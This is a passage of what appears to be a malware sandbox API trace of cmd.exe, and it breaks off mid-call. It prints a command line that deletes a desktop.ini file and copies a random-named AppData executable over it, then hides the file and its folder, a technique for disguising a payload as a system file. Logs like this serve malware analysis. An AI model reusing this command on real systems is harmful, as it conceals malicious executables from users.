GetEnvironmentStringsW () returned 0x2804a0* [0213.864] FreeEnvironmentStringsW (penv=0x2804a0) returned 1 [0213.864] GetEnvironmentStringsW 
() returned 0x2804a0* [0213.864] FreeEnvironmentStringsW (penv=0x2804a0) returned 1 [0213.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eda4 | out: phkResult=0x24eda4*=0x40) returned 0x0 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x50, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x1, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x1, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x0, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x40, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x40, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x40, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.865] RegCloseKey (hKey=0x40) 
returned 0x0 [0213.865] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eda4 | out: phkResult=0x24eda4*=0x40) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x40, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x1, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x1, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x0, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x9, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x9, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x9, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.865] RegCloseKey (hKey=0x40) returned 0x0 [0213.865] time (in: timer=0x0 | out: timer=0x0) returned 
0x5b8863af [0213.865] srand (_Seed=0x5b8863af) [0213.865] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"" [0213.865] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"" [0213.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.866] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.866] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.866] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.866] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.866] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.866] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") 
returned 11 [0213.866] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.866] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.866] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.867] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.867] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.867] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.867] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.867] GetEnvironmentStringsW () returned 0x2825f0* [0213.867] FreeEnvironmentStringsW (penv=0x2825f0) returned 1 [0213.867] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.867] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.867] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.867] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.867] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.867] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.867] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.867] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.867] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.867] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.867] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fb70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.867] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fb70, lpFilePart=0x24fb6c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fb6c*="Desktop") returned 0x18 [0213.867] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 
[0213.868] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f8ec | out: lpFindFileData=0x24f8ec) returned 0x280c80 [0213.868] FindClose (in: hFindFile=0x280c80 | out: hFindFile=0x280c80) returned 1 [0213.868] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f8ec | out: lpFindFileData=0x24f8ec) returned 0x280c80 [0213.868] FindClose (in: hFindFile=0x280c80 | out: hFindFile=0x280c80) returned 1 [0213.868] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f8ec | out: lpFindFileData=0x24f8ec) returned 0x280c80 [0213.868] FindClose (in: hFindFile=0x280c80 | out: hFindFile=0x280c80) returned 1 [0213.869] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.869] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.869] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.869] GetEnvironmentStringsW () returned 0x2804a0* [0213.869] FreeEnvironmentStringsW (penv=0x2804a0) returned 1 [0213.869] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.870] GetConsoleOutputCP () returned 0x1b5 [0213.870] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.870] GetUserDefaultLCID () returned 0x409 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fcb0, cchData=128 | out: lpLCData="0") returned 2 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fcb0, cchData=128 | out: lpLCData="0") returned 2 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fcb0, cchData=128 | out: lpLCData="1") returned 2 [0213.870] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.871] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.872] GetConsoleTitleW (in: lpConsoleTitle=0x270ac8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.872] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.872] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.872] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.872] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.873] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0213.874] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0213.874] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 
5 [0213.874] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0213.874] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0213.874] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0213.874] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0213.876] _wcsicmp (_String1="del", _String2=")") returned 59 [0213.876] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0213.876] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0213.876] _wcsicmp (_String1="IF", _String2="del") returned 5 [0213.876] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0213.876] _wcsicmp (_String1="REM", _String2="del") returned 14 [0213.876] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0213.879] _wcsicmp (_String1="type", _String2=")") returned 75 [0213.879] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0213.879] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0213.879] _wcsicmp (_String1="IF", _String2="type") returned -11 [0213.879] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0213.879] _wcsicmp (_String1="REM", _String2="type") returned -2 [0213.879] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0214.082] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.082] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.088] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.089] FindClose (in: hFindFile=0x282530 | out: hFindFile=0x282530) returned 1 [0214.089] FindClose (in: hFindFile=0x282530 | out: hFindFile=0x282530) returned 1 [0214.089] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0214.090] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0214.090] 
GetConsoleTitleW (in: lpConsoleTitle=0x24f6d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.090] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f560, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f628 | out: lpAttributeList=0x24f560, lpSize=0x24f628) returned 1 [0214.090] UpdateProcThreadAttribute (in: lpAttributeList=0x24f560, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f620, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f560, lpPreviousValue=0x0) returned 1 [0214.090] GetStartupInfoW (in: lpStartupInfo=0x24f51c | out: lpStartupInfo=0x24f51c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0214.090] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.091] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f5bc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f608 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", lpProcessInformation=0x24f608*(hProcess=0x50, hThread=0x4c, dwProcessId=0x994, dwThreadId=0xba0)) returned 1 
[0214.206] CloseHandle (hObject=0x4c) returned 1 [0214.206] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.206] GetEnvironmentStringsW () returned 0x2809d0* [0214.206] FreeEnvironmentStringsW (penv=0x2809d0) returned 1 [0214.206] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0214.342] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f4fc | out: lpExitCode=0x24f4fc*=0x0) returned 1 [0214.342] CloseHandle (hObject=0x50) returned 1 [0214.342] _vsnwprintf (in: _Buffer=0x24f644, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f508 | out: _Buffer="00000000") returned 8 [0214.342] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.342] GetEnvironmentStringsW () returned 0x282580* [0214.342] FreeEnvironmentStringsW (penv=0x282580) returned 1 [0214.342] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.342] GetEnvironmentStringsW () returned 0x282580* [0214.342] FreeEnvironmentStringsW (penv=0x282580) returned 1 [0214.343] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f560 | out: lpAttributeList=0x24f560) [0214.343] GetConsoleTitleW (in: lpConsoleTitle=0x24f8e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.343] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\desktop.ini")) returned 0xffffffff [0214.343] GetLastError () returned 0x2 [0214.343] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x10 [0214.343] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0214.343] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0214.343] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\desktop.ini")) returned 0xffffffff [0214.343] 
GetLastError () returned 0x2 [0214.344] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x24f38c | out: lpConsoleScreenBufferInfo=0x24f38c) returned 1 [0214.344] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0214.345] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0214.345] GetConsoleTitleW (in: lpConsoleTitle=0x24f87c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.345] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0214.346] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.346] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.346] GetFileType (hFile=0x50) returned 0x1 [0214.346] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.346] GetFileType (hFile=0x50) returned 0x1 [0214.346] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.346] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] GetFileType (hFile=0x50) returned 0x1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] GetFileType 
(hFile=0x50) returned 0x1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] GetFileType (hFile=0x50) returned 0x1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] GetFileType (hFile=0x50) returned 0x1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.348] SetFilePointerEx (in: hFile=0x58, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.348] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, 
lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, 